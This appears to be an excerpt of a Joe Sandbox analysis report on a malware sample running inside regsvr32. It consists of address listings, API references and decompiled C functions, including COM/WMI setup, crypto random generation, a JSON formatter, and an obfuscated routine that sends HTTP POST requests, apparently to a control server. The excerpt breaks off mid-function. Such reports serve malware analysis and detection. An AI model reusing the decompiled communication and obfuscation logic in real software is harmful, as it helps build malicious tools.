                                                                                                                                                                                              0x04afec81
                                                                                                                                                                                              0x04afec84
                                                                                                                                                                                              0x04afec87
                                                                                                                                                                                              0x04afecc3
                                                                                                                                                                                              0x04afecc3
                                                                                                                                                                                              0x04afecc6
                                                                                                                                                                                              0x04afed72
                                                                                                                                                                                              0x04afed86
                                                                                                                                                                                              0x04afed96
                                                                                                                                                                                              0x04afed9a
                                                                                                                                                                                              0x04afed9c
                                                                                                                                                                                              0x04afedb3
                                                                                                                                                                                              0x04afedb7
                                                                                                                                                                                              0x04afedc0
                                                                                                                                                                                              0x04afedcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afedcb
                                                                                                                                                                                              0x04afeda2
                                                                                                                                                                                              0x04afeda3
                                                                                                                                                                                              0x04afeda8
                                                                                                                                                                                              0x04afeda8
                                                                                                                                                                                              0x04afedaa
                                                                                                                                                                                              0x04afedab
                                                                                                                                                                                              0x04afedb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afedb0
                                                                                                                                                                                              0x04afeccc
                                                                                                                                                                                              0x04afeccc
                                                                                                                                                                                              0x04afeccf
                                                                                                                                                                                              0x04afed3a
                                                                                                                                                                                              0x04afed4e
                                                                                                                                                                                              0x04afed5e
                                                                                                                                                                                              0x04afed62
                                                                                                                                                                                              0x04afed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afed6a
                                                                                                                                                                                              0x04afed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afed6b
                                                                                                                                                                                              0x04afecd1
                                                                                                                                                                                              0x04afecd1
                                                                                                                                                                                              0x04afecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afecd6
                                                                                                                                                                                              0x04afecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afecdb
                                                                                                                                                                                              0x04afecdb
                                                                                                                                                                                              0x04afece1
                                                                                                                                                                                              0x04afecfd
                                                                                                                                                                                              0x04afed0c
                                                                                                                                                                                              0x04afed15
                                                                                                                                                                                              0x04afed1a
                                                                                                                                                                                              0x04afed1d
                                                                                                                                                                                              0x04afed23
                                                                                                                                                                                              0x04afed23
                                                                                                                                                                                              0x04afed28
                                                                                                                                                                                              0x04afed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afed34
                                                                                                                                                                                              0x04afece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afece6
                                                                                                                                                                                              0x04afec89
                                                                                                                                                                                              0x04afecb0
                                                                                                                                                                                              0x04afecb5
                                                                                                                                                                                              0x04afecba
                                                                                                                                                                                              0x04afecbc
                                                                                                                                                                                              0x04afecbc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afecba
                                                                                                                                                                                              0x04afec8b
                                                                                                                                                                                              0x04afec8b
                                                                                                                                                                                              0x04afec8e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec94
                                                                                                                                                                                              0x04afec94
                                                                                                                                                                                              0x04afec97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec9d
                                                                                                                                                                                              0x04afec9d
                                                                                                                                                                                              0x04afeca0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeca6
                                                                                                                                                                                              0x04afeca9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afecab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afecab
                                                                                                                                                                                              0x04afeded
                                                                                                                                                                                              0x04afedf3
                                                                                                                                                                                              0x04afedf9
                                                                                                                                                                                              0x04afedfc
                                                                                                                                                                                              0x04afedff
                                                                                                                                                                                              0x04afedff
                                                                                                                                                                                              0x04afee02
                                                                                                                                                                                              0x04afee03
                                                                                                                                                                                              0x04afee06
                                                                                                                                                                                              0x04afee08
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee58
                                                                                                                                                                                              0x04afee58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee58
                                                                                                                                                                                              0x04afeb8f
                                                                                                                                                                                              0x04afeb95
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb95
                                                                                                                                                                                              0x04afee55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afead8
                                                                                                                                                                                              0x04afeadd
                                                                                                                                                                                              0x04afeae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeae6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE413
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE424
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoCreateInstance.OLE32(04B0C868,00000000,00000001,04B0C878,?,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE43B
                                                                                                                                                                                                • Part of subcall function 04AFE400: SysAllocString.OLEAUT32(00000000), ref: 04AFE446
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE471
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFEAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFEB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFEE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFEE99
                                                                                                                                                                                                • Part of subcall function 04AF8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04AF8C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 1fe39f7527a51b50b629b962cfcdf10edffbf08f7a9ed25c5f9ebd39fd81df9e
                                                                                                                                                                                              • Instruction ID: 416dc8e1c255ecfe2fa2a5e848d808c4abb296de70a8599c8457e4339459f938
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe39f7527a51b50b629b962cfcdf10edffbf08f7a9ed25c5f9ebd39fd81df9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E13CB1E00219AFDB14EFE8CD84AAEBBB9FF48305F148459F605A7294DB74B941CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B028F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E04B028F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E04B0284B( &_v16);
				return 0;
			}











                                                                                                                                                                                              0x04b028f6
                                                                                                                                                                                              0x04b02908
                                                                                                                                                                                              0x04b0290c
                                                                                                                                                                                              0x04b02980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b02982
                                                                                                                                                                                              0x04b0291c
                                                                                                                                                                                              0x04b02920
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b02928
                                                                                                                                                                                              0x04b0292a
                                                                                                                                                                                              0x04b0292f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b02939
                                                                                                                                                                                              0x04b0293d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0293f
                                                                                                                                                                                              0x04b02944
                                                                                                                                                                                              0x04b02946
                                                                                                                                                                                              0x04b02948
                                                                                                                                                                                              0x04b0294d
                                                                                                                                                                                              0x04b02952
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0295d
                                                                                                                                                                                              0x04b02967
                                                                                                                                                                                              0x04b0296b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0297a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04AF7B6A), ref: 04B02902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 04B0291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 04B02928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 04B02937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 2ac241363b9f962f730f357035d4177f3b977451b5ca7a2922c64a767b1eaac3
                                                                                                                                                                                              • Instruction ID: 55c64431f907ec791a7556ee706a077516eefd3222c3185b7929c9fb00587e38
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ac241363b9f962f730f357035d4177f3b977451b5ca7a2922c64a767b1eaac3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09118272A4030A77DB2196B49C49F9EBAACDF54B52F1541F1E600F31D0EA70FE098AA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFF7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E04AFF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E04AF9DD8(0xd62);
				_v52 = E04AF9DD8(0x8e9);
				_v48 = E04AF9DD8(0xa93);
				_v44 = E04AF9DD8(0x9a9);
				_t94 = E04AF9DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E04AF8D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E04AFA43D(_t190));
				_t102 =  *0x4b0f838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x4b0f838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x4b0f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E04AFF73E(_t189);
							_t110 =  *0x4b0f838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E04AFA065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x4b0f838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E04AFA065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E04AFF6EC(_t116);
									}
									_t117 = E04AF9DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x4b0f838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E04AFA43D(_t193), _a4, _a8);
									E04AF8B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E04AFA065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E04AF8D6D( &_v20, 0, _t122);
										_t127 =  *0x4b0f838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E04AF9F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x4b0f838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x4b0f838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x4b0f838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x4b0f838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x4b0f838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x4b0f838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x4b0f838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x4b0f838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x4b0f838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                                              0x04aff7b4
                                                                                                                                                                                              0x04aff7c0
                                                                                                                                                                                              0x04aff7c7
                                                                                                                                                                                              0x04aff7d4
                                                                                                                                                                                              0x04aff7d7
                                                                                                                                                                                              0x04aff7e8
                                                                                                                                                                                              0x04aff7ff
                                                                                                                                                                                              0x04aff80c
                                                                                                                                                                                              0x04aff819
                                                                                                                                                                                              0x04aff826
                                                                                                                                                                                              0x04aff829
                                                                                                                                                                                              0x04aff82e
                                                                                                                                                                                              0x04aff833
                                                                                                                                                                                              0x04aff835
                                                                                                                                                                                              0x04aff83d
                                                                                                                                                                                              0x04aff845
                                                                                                                                                                                              0x04aff84c
                                                                                                                                                                                              0x04aff858
                                                                                                                                                                                              0x04aff85b
                                                                                                                                                                                              0x04aff869
                                                                                                                                                                                              0x04aff86c
                                                                                                                                                                                              0x04aff872
                                                                                                                                                                                              0x04aff873
                                                                                                                                                                                              0x04aff875
                                                                                                                                                                                              0x04aff87e
                                                                                                                                                                                              0x04aff87f
                                                                                                                                                                                              0x04aff884
                                                                                                                                                                                              0x04aff88a
                                                                                                                                                                                              0x04aff894
                                                                                                                                                                                              0x04aff894
                                                                                                                                                                                              0x04aff896
                                                                                                                                                                                              0x04aff89b
                                                                                                                                                                                              0x04aff8a5
                                                                                                                                                                                              0x04aff8b0
                                                                                                                                                                                              0x04aff8b9
                                                                                                                                                                                              0x04aff8bb
                                                                                                                                                                                              0x04aff8bd
                                                                                                                                                                                              0x04aff8cc
                                                                                                                                                                                              0x04aff8e3
                                                                                                                                                                                              0x04aff8e9
                                                                                                                                                                                              0x04aff8ec
                                                                                                                                                                                              0x04aff8f0
                                                                                                                                                                                              0x04aff8f2
                                                                                                                                                                                              0x04aff8f7
                                                                                                                                                                                              0x04aff8f7
                                                                                                                                                                                              0x04aff8fc
                                                                                                                                                                                              0x04aff8fe
                                                                                                                                                                                              0x04aff914
                                                                                                                                                                                              0x04aff918
                                                                                                                                                                                              0x04aff91d
                                                                                                                                                                                              0x04aff91f
                                                                                                                                                                                              0x04aff91f
                                                                                                                                                                                              0x04aff933
                                                                                                                                                                                              0x04aff93e
                                                                                                                                                                                              0x04aff941
                                                                                                                                                                                              0x04aff944
                                                                                                                                                                                              0x04aff947
                                                                                                                                                                                              0x04aff94c
                                                                                                                                                                                              0x04aff951
                                                                                                                                                                                              0x04aff951
                                                                                                                                                                                              0x04aff954
                                                                                                                                                                                              0x04aff956
                                                                                                                                                                                              0x04aff97c
                                                                                                                                                                                              0x04aff980
                                                                                                                                                                                              0x04aff984
                                                                                                                                                                                              0x04aff984
                                                                                                                                                                                              0x04aff98e
                                                                                                                                                                                              0x04aff996
                                                                                                                                                                                              0x04aff99b
                                                                                                                                                                                              0x04aff9a6
                                                                                                                                                                                              0x04aff9ac
                                                                                                                                                                                              0x04aff9b6
                                                                                                                                                                                              0x04aff9b9
                                                                                                                                                                                              0x04aff9be
                                                                                                                                                                                              0x04aff9c2
                                                                                                                                                                                              0x04aff9c7
                                                                                                                                                                                              0x04aff9c7
                                                                                                                                                                                              0x04aff9cc
                                                                                                                                                                                              0x04aff9d0
                                                                                                                                                                                              0x04affa1b
                                                                                                                                                                                              0x04affa1d
                                                                                                                                                                                              0x04affa20
                                                                                                                                                                                              0x04affa28
                                                                                                                                                                                              0x04affa2c
                                                                                                                                                                                              0x04affa2f
                                                                                                                                                                                              0x04affa41
                                                                                                                                                                                              0x04affa4c
                                                                                                                                                                                              0x04affa4e
                                                                                                                                                                                              0x04affa62
                                                                                                                                                                                              0x04affa67
                                                                                                                                                                                              0x04affa6c
                                                                                                                                                                                              0x04affaa1
                                                                                                                                                                                              0x04affaa6
                                                                                                                                                                                              0x04affaab
                                                                                                                                                                                              0x04affaad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affaad
                                                                                                                                                                                              0x04affa70
                                                                                                                                                                                              0x04affa73
                                                                                                                                                                                              0x04affa73
                                                                                                                                                                                              0x04affa79
                                                                                                                                                                                              0x04affa7c
                                                                                                                                                                                              0x04affa7f
                                                                                                                                                                                              0x04affa7f
                                                                                                                                                                                              0x04affa81
                                                                                                                                                                                              0x04affa83
                                                                                                                                                                                              0x04affa89
                                                                                                                                                                                              0x04affa89
                                                                                                                                                                                              0x04affa8c
                                                                                                                                                                                              0x04affa8e
                                                                                                                                                                                              0x04affa90
                                                                                                                                                                                              0x04affa97
                                                                                                                                                                                              0x04affa97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affa9a
                                                                                                                                                                                              0x04affa50
                                                                                                                                                                                              0x04affa56
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04aff9d2
                                                                                                                                                                                              0x04aff9d2
                                                                                                                                                                                              0x04aff9d8
                                                                                                                                                                                              0x04aff9de
                                                                                                                                                                                              0x04aff9e1
                                                                                                                                                                                              0x04aff9e6
                                                                                                                                                                                              0x04aff9eb
                                                                                                                                                                                              0x04aff9ee
                                                                                                                                                                                              0x04aff9f3
                                                                                                                                                                                              0x04aff9f3
                                                                                                                                                                                              0x04aff9f6
                                                                                                                                                                                              0x04aff9f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04aff9f9
                                                                                                                                                                                              0x04aff958
                                                                                                                                                                                              0x04aff958
                                                                                                                                                                                              0x04aff95e
                                                                                                                                                                                              0x04aff964
                                                                                                                                                                                              0x04aff967
                                                                                                                                                                                              0x04aff96c
                                                                                                                                                                                              0x04aff96f
                                                                                                                                                                                              0x04aff972
                                                                                                                                                                                              0x04aff974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04aff974
                                                                                                                                                                                              0x04aff900
                                                                                                                                                                                              0x04aff900
                                                                                                                                                                                              0x04aff906
                                                                                                                                                                                              0x04aff90c
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff8fe
                                                                                                                                                                                              0x04aff8bf
                                                                                                                                                                                              0x04aff9fe
                                                                                                                                                                                              0x04affa01
                                                                                                                                                                                              0x04affa03
                                                                                                                                                                                              0x04affa06
                                                                                                                                                                                              0x04affa09
                                                                                                                                                                                              0x04affa09
                                                                                                                                                                                              0x04affa12
                                                                                                                                                                                              0x04affa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affa18
                                                                                                                                                                                              0x04aff88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 04AFF7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 04AFF7E8
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 04AFF8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 0f30b5b7058f8260c48a4f43e2bc3fee46c9556c66766167077f038186b65472
                                                                                                                                                                                              • Instruction ID: ac054949acd450b262af1751ae677f3a51238acd0103366dc81fa452b02a215e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f30b5b7058f8260c48a4f43e2bc3fee46c9556c66766167077f038186b65472
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59A1EE71A00218AFDB25EFA4DC88AEE77B8FF48315F10406AF905E7250DB74AE45CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B01464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 9bdf4d37ff49ef9e340c02283e6abf5383c8c51123cb66f5deec32ef6b7c6026
                                                                                                                                                                                              • Instruction ID: 2fc20b9428ca5ec132f5d91263ad59d70c6d275990f17afa516cdc43276f38bd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bdf4d37ff49ef9e340c02283e6abf5383c8c51123cb66f5deec32ef6b7c6026
                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E193B190020ABFEF199F58CC45EAF3F69EF45346F00C095FD159A1D1E632EA618BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF50B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E04AF50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x4b0f81c; // 0x4c2fbe8
					_t5 = _t108 + 0x110; // 0x4c316b8
